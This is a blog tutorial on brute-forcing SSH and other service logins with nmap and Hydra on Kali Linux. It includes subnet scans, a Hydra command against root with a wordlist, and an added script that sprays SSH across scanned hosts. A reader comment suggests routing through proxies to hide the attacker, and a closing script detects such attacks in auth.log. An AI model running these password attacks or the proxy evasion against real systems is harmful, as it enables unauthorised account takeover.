Breaking SSH, VNC, and other passwords with Kali Linux and Hydra

My buddy Aamir Lakhani aka drchaos wrote a great post on breaking SSH, VNC and other services. The original post can be found HERE.

Hydra is a very fast and effective network login cracker. It will help you run brute force attacks against SSH servers, VNC and other services. Kali ships two front ends: xHydra (the hydra-gtk package) is the GUI, and hydra is the command line tool. This tutorial uses the command line version, which gives you much more flexibility in how the tool is used.

Wordlists

This attack requires a wordlist. Kali ships several under /usr/share/wordlists; this demo works well with the rockyou list at /usr/share/wordlists/rockyou.txt.gz. It is compressed, so extract it with gunzip before using it. You can also build your own with Aamir Lakhani's Dr. Chaos guide to creating custom wordlists with CeWL (http://www.drchaos.com/creating-custom-dictionary-files-using-cewl/) or simply download a pretty decent custom wordlist here: http://www.drchaos.com/public_files/chaos-dictionary.lst.txt

Scanning for SSH Servers using NMAP

The first thing we will do is scan for SSH services listening on port 22. We are going to scan the entire 10.1.100.0/24 subnet, but we could also scan a single host or a range.

Here's a simple example that scans every host on the subnet and reports any device listening on port 22. The output, including the SSH version each server is running (-sV), is redirected to a text file named ssh_hosts:

nmap -p 22 --open -sV 10.1.100.0/24 > ssh_hosts

We could also have scanned it this way, skipping host discovery (-Pn) and writing grepable output (-oG), which is easier to feed into other tools:

nmap -p 22 --open -Pn -sV -oG ssh_hosts 10.1.100.0/24

Or, another way: this prints just the IPs that have SSH open, by sending nmap's grepable output to stdout (-oG -) and keeping the address field of each line that reports port 22 as open (matching only "scan report for" lines, as the original pipeline did, would list every host that responded, not just those with SSH up):

nmap -p 22 10.44.46.0/27 -oG - | awk '/22\/open/ {print $2}'

Next I am going to use Hydra. Hydra is a very well-known and respected network logon cracker that supports many different services. (Medusa is a comparable online login cracker; John the Ripper, which is often mentioned alongside them, cracks password hashes offline rather than attacking live logins.)

Hydra can read usernames, passwords, or username and password combinations from external files. As a password/logon cracker it has been tested against the following protocols (run hydra -h to see the list supported by the version installed on your Kali system):

afp, cisco, cisco-enable, cvs, firebird, ftp, http-get, http-head, http-proxy, https-get, https-head, https-form-get, https-form-post, icq, imap, imap-ntlm, ldap2, ldap3, mssql, mysql, ncp, nntp, oracle-listener, pcanywhere, pcnfs, pop3, pop3-ntlm, postgres, rexec, rlogin, rsh, sapr3, sip, smb, smbnt, smtp-auth, smtp-auth-ntlm, snmp, socks5, ssh2, teamspeak, telnet, vmauthd, vnc

We are going to enter the command (note the uppercase -P: lowercase -p means a single password, uppercase -P a password file):

hydra -s 22 -v -l root -P /root/password.txt -t 10 192.168.0.128 ssh

The options in Hydra are very straightforward:

-s is the destination port (22 is the SSH default, so it could be omitted here)

-v verbose logging

-l tells Hydra you are providing a single static login (use -L with a file for multiple usernames)

-P is the password file (lowercase -p gives a single password instead)

-t is the number of parallel connections (tasks). Ten is aggressive for SSH: Hydra itself warns that many sshd configurations limit concurrent unauthenticated connections and recommends -t 4, and extra tasks beyond that limit just turn into connection errors

192.168.0.128 is the target, given as an IP address or host name after the options

ssh is the protocol module to use
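The scan and the Hydra run above are usually chained: extract the hosts with SSH open from nmap's grepable output and hand the whole list to Hydra with -M instead of one IP at a time. The script below is an added example, not code from the original post or from the Hydra project. The nmap output it parses is a constructed sample in -oG format so the parsing can be checked without a network; the hosts, version strings and the wordlist path are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): take grepable nmap output from
# the scanning step, keep only hosts with 22/open, and feed that list to
# Hydra with -M.
#
# CONSTRUCTED sample output in nmap's -oG format (real output separates the
# fields with tabs; any whitespace is fine for awk). Real output comes from:
#   nmap -p 22 --open -Pn -sV -oG ssh_hosts 10.1.100.0/24
SAMPLE_NMAP_OG='# Nmap 7.94 scan initiated Mon Mar  3 10:00:00 2025 as: nmap -p 22 -sV -oG ssh_hosts 10.1.100.0/24
Host: 10.1.100.5 ()   Status: Up
Host: 10.1.100.5 ()   Ports: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu/
Host: 10.1.100.9 ()   Status: Up
Host: 10.1.100.9 ()   Ports: 22/closed/tcp//ssh///
Host: 10.1.100.12 ()  Status: Up
Host: 10.1.100.12 ()  Ports: 22/open/tcp//ssh//Dropbear sshd 2022.83/
# Nmap done at Mon Mar  3 10:00:09 2025 -- 256 IP addresses (3 hosts up) scanned in 9.12 seconds'

# ssh_hosts_from_og FILE
# Print one IP per line for every host whose port 22 is reported open.
# Field 2 of a "Host:" line is the address; each entry in the Ports field is
# port/state/proto/..., so " 22/open/tcp" matches port 22 exactly and not,
# say, 2222/open.
ssh_hosts_from_og() {
    awk '/^Host:/ && /Ports:/ && / 22\/open\/tcp/ {print $2}' "$1"
}

# spray_ssh HOSTFILE USER WORDLIST
# Run Hydra against every host in HOSTFILE. -t 4 rather than the post's -t 10:
# Hydra warns that many sshd configurations throttle more than about four
# parallel connections. -f stops on the first valid pair per host and
# -o records the hits. Only prints the command when hydra is not installed.
spray_ssh() {
    if ! command -v hydra >/dev/null 2>&1; then
        echo "hydra not installed; would run:" >&2
        echo "hydra -M $1 -l $2 -P $3 -t 4 -s 22 -f -o hydra_hits.txt ssh" >&2
        return 0
    fi
    hydra -M "$1" -l "$2" -P "$3" -t 4 -s 22 -f -o hydra_hits.txt ssh
}

# Demo on the constructed sample: write it to a file and extract the targets.
og=$(mktemp); hostfile=$(mktemp)
printf '%s\n' "$SAMPLE_NMAP_OG" > "$og"
ssh_hosts_from_og "$og" > "$hostfile"
echo "SSH targets:"; cat "$hostfile"
# Set RUN_HYDRA=1 to actually launch the attack against the listed hosts
# (wordlist path is an assumption; gunzip rockyou.txt.gz first on Kali).
if [ -n "${RUN_HYDRA:-}" ]; then
    spray_ssh "$hostfile" root /usr/share/wordlists/rockyou.txt
fi
rm -f "$og" "$hostfile"
```

Replace -l root with -L users.txt to try a list of usernames against each host; with -M, -f stops per host while -F stops the whole run on the first hit.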

Special thanks to editor-in-chief Keith Rayle

One thought on “Breaking SSH, VNC, and other passwords with Kali Linux and Hydra”

  1. This is great, however all a victim needs to do is check the auth.log to see your IP and therefore your location.

    Running this behind a proxychain/HYDRA_PROXY is far better – you should have covered it
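The commenter's point is worth seeing from the other side. Every Hydra attempt leaves a "Failed password for ... from IP" line in sshd's log (/var/log/auth.log on Debian and Kali, /var/log/secure on RHEL-style systems), and a proxy such as the HYDRA_PROXY setting only changes which address appears there, not the pattern. The script below is an added example, not code from the post or the commenter; the log lines are constructed in sshd's format, with one source spraying root and an invalid user until it gets in, and one legitimate user mistyping once and then authenticating with a key.

```shell
#!/bin/sh
# Added example (not from the post or the commenter): the defender's view of
# a Hydra SSH run, as it appears in auth.log. Lines below are CONSTRUCTED.
SAMPLE_AUTH_LOG='Mar  3 10:14:01 target sshd[2201]: Failed password for root from 192.168.0.200 port 51000 ssh2
Mar  3 10:14:01 target sshd[2203]: Failed password for root from 192.168.0.200 port 51001 ssh2
Mar  3 10:14:02 target sshd[2205]: Failed password for invalid user admin from 192.168.0.200 port 51002 ssh2
Mar  3 10:14:02 target sshd[2207]: Failed password for root from 192.168.0.200 port 51003 ssh2
Mar  3 10:14:03 target sshd[2209]: Accepted password for root from 192.168.0.200 port 51004 ssh2
Mar  3 10:15:10 target sshd[2300]: Failed password for alice from 10.0.0.7 port 40010 ssh2
Mar  3 10:15:40 target sshd[2310]: Accepted publickey for alice from 10.0.0.7 port 40011 ssh2'

# failed_by_source LOG MIN
# Count failed password attempts per source address and print "count ip" for
# every source with at least MIN failures, busiest first. The address is the
# word after "from", which is the same in the "invalid user" variant.
failed_by_source() {
    awk -v min="$2" '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") n[$(i+1)]++
        }
        END { for (ip in n) if (n[ip] >= min) print n[ip], ip }
    ' "$1" | sort -rn
}

# success_after_failures LOG MIN
# Sources that logged at least MIN failures and then an "Accepted password":
# a guess worked, which is the event that needs a response, not just a log.
# Lines are processed in order, so only failures before the accept count.
success_after_failures() {
    awk -v min="$2" '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") n[$(i+1)]++
        }
        /sshd\[[0-9]+\]: Accepted password for/ {
            for (i = 1; i <= NF; i++)
                if ($i == "from" && n[$(i+1)] >= min) hit[$(i+1)] = 1
        }
        END { for (ip in hit) print ip }
    ' "$1" | sort
}

# Demo on the constructed log.
log=$(mktemp)
printf '%s\n' "$SAMPLE_AUTH_LOG" > "$log"
echo "Sources with 3+ failed passwords:"; failed_by_source "$log" 3
echo "Sources that failed 3+ times and then got in:"; success_after_failures "$log" 3
rm -f "$log"
```

On a real host point both functions at /var/log/auth.log; the threshold keeps a user's single typo out of the report while a wordlist run, which produces hundreds of failures from one address in seconds, stands out immediately.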
